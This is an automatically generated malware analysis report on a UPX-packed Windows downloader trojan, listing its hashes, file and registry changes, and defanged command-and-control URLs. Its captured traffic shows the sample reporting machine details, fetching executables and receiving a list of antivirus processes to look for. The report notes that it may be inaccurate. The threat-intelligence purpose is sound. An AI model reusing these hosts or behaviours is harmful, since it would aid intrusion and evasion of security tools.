Gen.Variant.Application.Downloader.Nezchi.1_ebe2b9b81a

by malwarelabrobot on August 5th, 2017 in Malware Descriptions.

Gen:Variant.Application.Downloader.Nezchi.1 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.



MD5: ebe2b9b81a906ea9eb1f48e9f63f9a70
SHA1: 1afeb84a033ac1b742c0a3ac9fa1376c622db88c
SHA256: 0ede1721b55bd4f9079b2e0d551463a9da7612079220650590aa894ed6a61ed0
SSDeep: 12288:3umw/LBRj5WB/yw3LWBAp 1frbYDgKt8 kws8LY/G4dde: m0zmFLW11wDg AwsOY 4dde
Size: 549063 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-04 15:11:33
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3676
H~Yset.exe:2944

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe (190217 bytes)

The process H~Yset.exe:2944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (5873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (7971 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (0 bytes)

Registry activity

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ebe2b9b81a906ea9eb1f48e9f63f9a70_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\ebe2b9b81a906ea9eb1f48e9f63f9a70_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

The process H~Yset.exe:2944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
6fc6b0b5248b8307ff5fc7af691eedfe c:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: YDler.exe
Product Version: 2.1.0.704
Legal Copyright: Copyright (C) 2017
Legal Trademarks:
Original Filename: YDler.exe
Internal Name: YDler.exe
File Version: 2.1.0.704
File Description: ?????
Comments:
Language: Russian (Russia)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 774144 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 778240 507904 507904 5.49544 88f4de0f17c5de22e7249c097e411190
.rsrc 1286144 28672 25600 2.79634 3a6bb189fa9bbb5f93de64e0a4504cc3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5

URLs

URL IP
hxxp://rj.58levo.com/api.php 222.186.161.27
hxxp://api.baizhu.cc/api/getlist 120.26.109.229
hxxp://api.baizhu.cc/api/getinfo 120.26.109.229
hxxp://down.qhcdn.com/360/inst.exe
hxxp://123.206.109.96/o/icc.html
hxxp://cdn.baizhu.cc.w.kunlunpi.com/baizhu.zip 124.47.11.89
hxxp://rj.58levo.com/upgrape.php 222.186.161.27
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://113.17.184.163/love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=316332277313300274
hxxp://down.360safe.com/360/inst.exe
hxxp://113.17.184.163/love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=......


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /ic.asp HTTP/1.1
Accept: */*
Referer: hXXp://1212.ip138.com/ic.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 1212.ip138.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCABBADSQ=IKCGGGECIEMCDGBMMNLKMCNJ; path=/
Cache-control: private
<html><head><meta http-equiv="content-type" content="text/html; charset=gb2312"><title> ....IP.... </title></head><body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>


POST /api/getinfo HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW32; Trident/5.0)
Content-Length: 194
Host: api.baizhu.cc

js={"appid":"1","getlist":{"inslog":"","proc":null,"reg":null},"id":1033,"mac":"00-50-56-3B-AE-AC","md5":"EBE2B9B81A906EA9EB1F48E9F63F9A70","rgn":"","sid":"360","st":0,"ver":"2.1.0.704","zn":2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:06 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Connection: close
Vary: Accept-Encoding
{"close":true,"loading":true,"XLDOWN":200000000,"charset":"utf-8","xlu
rl":"http:\/\/cdn.baizhu.cc\/exe1\/ThunderSpeed1.0.35.366.exe","smallr
ange":0,"ip":"194.242.96.218","color":0,"ClearV":false,"logo":"http:\/
\/cdn.baizhu.cc\/baizhu.zip","mainres":"","mainres2":"","tempdir":"gzs
s","setres":"http:\/\/cdn.baizhu.cc\/exe\/skin-lao0516.zip","linkname"
:"\u7f51\u5740\u5bfc\u822a,\u7f51\u5740\u5927\u5168,\u4e0a\u7f51\u9996
\u9009","exthistory":{"mime":"","name":"qyhelper.dll","url":"http:\/\/
cdn.baizhu.cc\/dll\/qyhelper.dll","param":"bd_8501","type":2},"favo":[
],"favo1":[],"dq":[],"link":[{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n
36a7f6a197","id":0},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a19
7","id":1},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":2
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":3},{"url":
"","id":4},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":5
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":6},{"url":
"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":7},{"url":"","id":8
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":9},{"url":
"http:\/\/jinmeo.xrbbn.com","id":10},{"url":"https:\/\/VVV.baidu.com\/
link?url=6ts7NuJosrL9wM2NoBWnl7WxAkg_nLna7z2SQfIeSKiRGiAj3lMSVu1b3x3dN
oYf","id":11},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id
":12},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":13},{"
url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":14},{"url":"ht
tp:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":15},{"url":"http:\

<<< skipped >>>

POST /api/getlist HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW32; Trident/5.0)
Content-Length: 147
Host: api.baizhu.cc

js={"appid":"1","id":1033,"mac":"00-50-56-3B-AE-AC","md5":"EBE2B9B81A906EA9EB1F48E9F63F9A70","rgn":"","sid":"360","st":0,"ver":"2.1.0.704","zn":2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:04 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Connection: close
Vary: Accept-Encoding
{"proc":[{"id":"1","proc":"360tray.exe","status":"1"},{"id":"2","proc"
:"360sd.exe","status":"1"},{"id":"3","proc":"zhudongfangyu.exe","statu
s":"1"},{"id":"4","proc":"QQPCRTP.exe","status":"1"},{"id":"5","proc":
"kxescore.exe","status":"1"},{"id":"6","proc":"kxetray.exe","status":"
1"},{"id":"7","proc":"BaiduAnTray.exe","status":"1"},{"id":"8","proc":
"BaiduSdTray.exe","status":"1"},{"id":"9","proc":"wxclient.exe","statu
s":"1"},{"id":"10","proc":"BarChargesView.exe","status":"1"},{"id":"11
","proc":"2345SafeTray.exe","status":"1"},{"id":"12","proc":"M11SASCui
L.exe","status":"1"},{"id":"13","proc":"MsMpEng.exe","status":"1"},{"i
d":"14","proc":"MpCmdRun.exe","status":"1"},{"id":"15","proc":"MSASCui
L.exe","status":"1"}],"reg":[{"id":86,"type":2,"path":"SOFTWARE\\Micro
soft\\Windows\\CurrentVersion\\Uninstall\\\u6d77\u6dd81\u53f7","name":
"DisplayIcon","wow64":1},{"id":87,"type":2,"path":"SOFTWARE\\Microsoft
\\Windows\\CurrentVersion\\Uninstall\\\u5947\u4e50\u6e38\u620f\u76d2",
"name":"UninstallString","wow64":1},{"id":89,"type":3,"path":"SOFTWARE
\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{DF48EBD2-24BD-4f52-9
D31-2AEBAC8133B0}","name":"UninstallString","wow64":1},{"id":90,"type"
:3,"path":"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\QQ
\u6e38\u620f","name":"UninstallString","wow64":1},{"id":91,"type":3,"p
ath":"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\u6e38\
u65cf\u76d7\u5893\u7b14\u8bb0","name":"UninstallString","wow64":1},{"i
d":92,"type":3,"path":"SOFTWARE\\Microsoft\\Windows\\CurrentVersio

<<< skipped >>>

POST /api.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 46
Host: rj.58levo.com

dt=..\WOPG...\RSG..\QQLTQLTWLR#L $L "G.....\X
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:01 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27
X-Powered-By: PHP/5.5.27
Content-Length: 66
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
....XMMSPQLPRTLSR[L[TM.M...L......T$!T R WPVZ ZQRU$$W$!U#$T[S''&$'


HEAD /o/icc.html HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 123.206.109.96


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:13 GMT
Connection: Keep-Alive
Content-Type: text/html
Last-Modified: Sun, 28 Jul 2017 10:44:40 GMT
Content-Length: 384512
....



GET /o/icc.html HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 123.206.109.96


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:14 GMT
Connection: Keep-Alive
Content-Type: text/html
Last-Modified: Sun, 28 Jul 2017 10:44:40 GMT
Content-Length: 384512

<<< skipped >>>

GET /love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=...... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 113.17.184.163
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:10 GMT
Connection: Keep-Alive
Set-Cookie: ADSMBCFGLOLRZIGWEGAU=YDGEJFFLCEBCJTJQOGPHWKWFVBXUAZZYADALBGCA; path=/
Cache-control: private
Content-Type: text/html
Expires: Fri, 04 Aug 2017 17:49:10 GMT
Content-Length: 0


POST /upgrape.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 4
Host: rj.58levo.com

dt=2
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:34 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27
X-Powered-By: PHP/5.5.27
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
true


GET /360/inst.exe HTTP/1.1
Host: down.360safe.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Cookie:


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:08 GMT
Content-Type: application/octet-stream
Content-Length: 1627048
Last-Modified: Fri, 13 Jan 2017 02:30:15 GMT
Connection: close
Expires: Sat, 05 Aug 2017 01:49:08 GMT
Cache-Control: max-age=28800
Accept-Ranges: bytes

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_3676:

Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
Content-Length: in d response
Transfer-Encoding: in d response
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
NTLM handshake failure (type-3 message): Status=%x
%sAuthorization: Negotiate %s
2.5.4.3
2.5.29.17
1.2.840.10040.4.1
1.2.840.10040.4.3
1.2.840.10045.2.1
ecPublicKey
1.2.840.10045.3.0.1
1.2.840.10045.4.1
1.2.840.10046.2.1
1.2.840.113549.1.1.1
1.2.840.113549.1.1.2
1.2.840.113549.1.1.4
1.2.840.113549.1.1.5
1.2.840.113549.1.1.10
1.2.840.113549.1.1.14
1.2.840.113549.1.1.11
1.2.840.113549.1.1.12
1.2.840.113549.1.1.13
1.2.840.113549.2.2
1.2.840.113549.2.5
1.3.14.3.2.26
2.5.4.4
2.5.4.5
2.5.4.6
2.5.4.7
2.5.4.8
2.5.4.9
2.5.4.10
2.5.4.11
2.5.4.12
2.5.4.13
2.5.4.17
2.5.4.41
2.5.4.42
2.5.4.43
2.5.4.44
2.5.4.45
2.5.4.46
2.5.4.65
1.2.840.113549.1.9.1
2.5.4.72
2.5.29.18
2.5.29.19
2.16.840.1.101.3.4.2.4
2.16.840.1.101.3.4.2.1
2.16.840.1.101.3.4.2.2
2.16.840.1.101.3.4.2.3
x:
%s%lx
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s
%s: %s
RSA Public Key (%lu bits)
RSA Public Key
dsa(pub_key)
dh(pub_key)
- Subject: %s
Issuer: %s
Serial Number: %s
Signature Algorithm: %s
Start Date: %s
Expire Date: %s
Public Key Algorithm
Public Key Algorithm: %s
Signature: %s
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
Cert
KGS!@#$%server response timeout
LOGIN
Unsupported SASL authentication mechanism
0123456789-
SSPI error: %s failed: %s
rcmd
%s/%s
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SOCKS5 server supports GSS-API %s data protection.
Invalid SSPI encryption response type (%u %u).
SOCKS5 access with%s protection granted.
%s xxxxxxxxxxxxxxxx
user=%s
auth=Bearer %s
host=%s
port=%ld
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
%d.%d.%d (%s) 0x%x-0x%x
MDp_%d_(
).dmp
GET %s HTTP/1.1
Host: %s%s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
HTTP/1.1
HTTP/1.0
@1_360.exe
%d.%d.%d.%d
xlurl
descr_downurl
list_url
list_cmd
%s /S
/select, %s
%s:%d
&type=%d
POST %s HTTP/1.1
Host: %s
Content-Length: %d
Content-Type:application/x-www-form-urlencoded
kic.disk
mzd.live
kb.mdisk
<4,$?7/'
(3-!0,1'8"5.*2$
%s%d.%d
hXXp://
E:\[Project]\[BaizhuLocalStorage]\Output\Release\BZDownload.pdb
zcÁ
.?AVduReportView@@
.?AV?$CSingleton@VCDownloadAppDataReport@@@QSUtil@@
.?AVCDownloadAppDataReport@@
.?AVCTaskParam2@?$CTaskMgrHelper@VCDownloadAppDataReport@@@minilib@@
.?AVCCURLWrapper@@
.?AVCWebContainer@@
libcurl/7.53.1 WinSSL
%I%X,
.QAY9E?
PeekNamedPipe
GetCPInfo
GetProcessHeap
RegOpenKeyExA
RegCloseKey
CryptImportKey
CryptDestroyKey
CertFreeCertificateContext
GetViewportOrgEx
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
ShellExecuteA
GetKeyState
WinHttpReadData
WinHttpAddRequestHeaders
WinHttpQueryDataAvailable
WinHttpOpenRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpCrackUrl
WinHttpSetTimeouts
:?49) 3)
%9q%S
4448407
(;(=( 65\;U90(F50%0;(?P1O8@0)%(A2TE';@20A2:#:08.089LH _U,B&  ;75JO717150 00% 657W?;%F<<V6#
.text
`.rdata
@.data
@.rsrc
@.reloc
(;(=|65\;
7W?;%F<<V6#
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
CRYPT32.dll
d3d9.dll
dbghelp.dll
GDI32.dll
gdiplus.dll
IMM32.dll
MSIMG32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WINHTTP.dll
WLDAP32.dll
WS2_32.dll
error: [%s] is repeated
%s_%s_%s
reportview
config.xml
DirectUI.js
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
version="%s"
encoding="%s"
standalone="%s"
[%d]%s
RGB(%d,%d,%d)
(%d,%d)
OnVScroll Error pos[%d]
VertScrollBar Show[%d]
HorzScrollBar Show[%d]
duReportView
nSel :%d
ShockwaveFlash.ShockwaveFlash
AddResObj [%s] failed
<Unknown:%d>
failed to loading image[%s]
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
nMozilla post test/1.0
data.goosai.com
x/report/exception
kernel32.dll
page1_check_lk_%d
page1_check_lk_text_%d
page1_check_hk_%d
page1_check_hk_text_%d
page1_bottom_check_group%d
page1_btn_icon_%d
page1_icon_%d
page1_title_%d
page1_check_item_text_%d
page1_check_item_%d
page1_desc_%d
page1_list_item_%d
%.02f %s
page3_check_lk_%d
page3_check_lk_text_%d
page3_check_hk_%d
page3_check_hk_text_%d
page3_bottom_check_group%d
page3_btn_icon_%d
page3_icon_%d
page3_title_%d
page3_check_item_text_%d
page3_check_item_%d
page3_desc_%d
page3_list_item_%d
page3_bottom_check_lk_%d
ntdll.dll
Kernel32.dll
errorUrl
Shell.Explorer
c:\%original file name%.exe
2.1.0.704
YDler.exe

%original file name%.exe_3676_rwx_00C81000_00138000:

hu.cf
D$(Xj
D$0XY
SSSSh
hh h!"hh#$hhhh%&'hhh(h)*h hhh,-.hh/0123hhhh4h5hhhhhhh6hhhhhh789:;<hhhhhhhh=hhh>?@ABCDEhhhhFhhhhGHhhhhhIhJKLhhhhhMNhhhOOhhPhhhhhhhhhQhhRhSTUVWhXhhhhhhYZ[h\hh]^_hh`hahhbhcdhhefg
11111111111111111
>%ufj
8%u*@Sj%
t.Gj:W
j.Yf;
_tcPVj@
r%f;M
.PjRW
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Connection #%ld to host %s left intact
Pipe broke: handle %p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Hostname '%s' was found in DNS cache
Internal error removing splay node = %d
Internal error clearing splay node = %d
ignoring failed cookie_init for %s
23[^;
=] =I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %I64d
%s%s%s
# Netscape HTTP Cookie File
# hXXps://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
security.dll
secur32.dll
.Aproxy
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Hostname %s was found in DNS cache
%5[^:]:%d
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
%5[^:]:%d:%5s
Couldn't parse CURLOPT_RESOLVE entry '%s'!
Address in '%s' found illegal!
Added %s:%d:%s to DNS cache
Unrecognized parameter value passed via CURLOPT_SSLVERSION
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
can pipeline
Found bundle for host %s: %p [%s]
Server doesn't support multi-use yet, wait
Server doesn't support multi-use (yet)
Could pipeline, but not asked to!
Pipe is full, skip (%zu)
Multiplexed connection found!
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol "%s" not supported or disabled in libcurl
Illegal characters found in URL
Bad URL, colon is first character
Bad URL
127.0.0.1/
Invalid file://hostname/, expected localhost or 127.0.0.1 or none
/:]:%3[/]%[^
<url> malformed
SMTP.
smtp
Unwillingly accepted illegal URL using %d slash%s!
%s://%s%s
Rebuilt URL to: %s
Please URL encode %% as %%, see RFC 6874.
http_proxy
https
http:
Unsupported proxy scheme for '%s'
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.
No valid port number in proxy string (%s)
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number out of range
Illegal port number
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
No valid port number in connect to host string (%s)
Connecting to hostname: %s
Connecting to port: %d
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with %s %s
No more connections allowed to host: %d
User-Agent: %s
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
ftps
smtps
tftp
7.53.1
libcurl/7.53.1
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
%s in chunked-encoding
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
%%x
[^?&/:]://%c
Issue another request to this URL: '%s'
Disables POST, goes with %s
HTTPS
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
Connection closure while negotiating auth (HTTP 1.0?)
HTTP error before end of send, keep sending
HTTP error before end of send, stop sending
HTTP/%d.%d %d
HTTP/2 %d
Lying server, not serving HTTP/2
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
%s:%ld
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
d:d:d%n
d:d%n
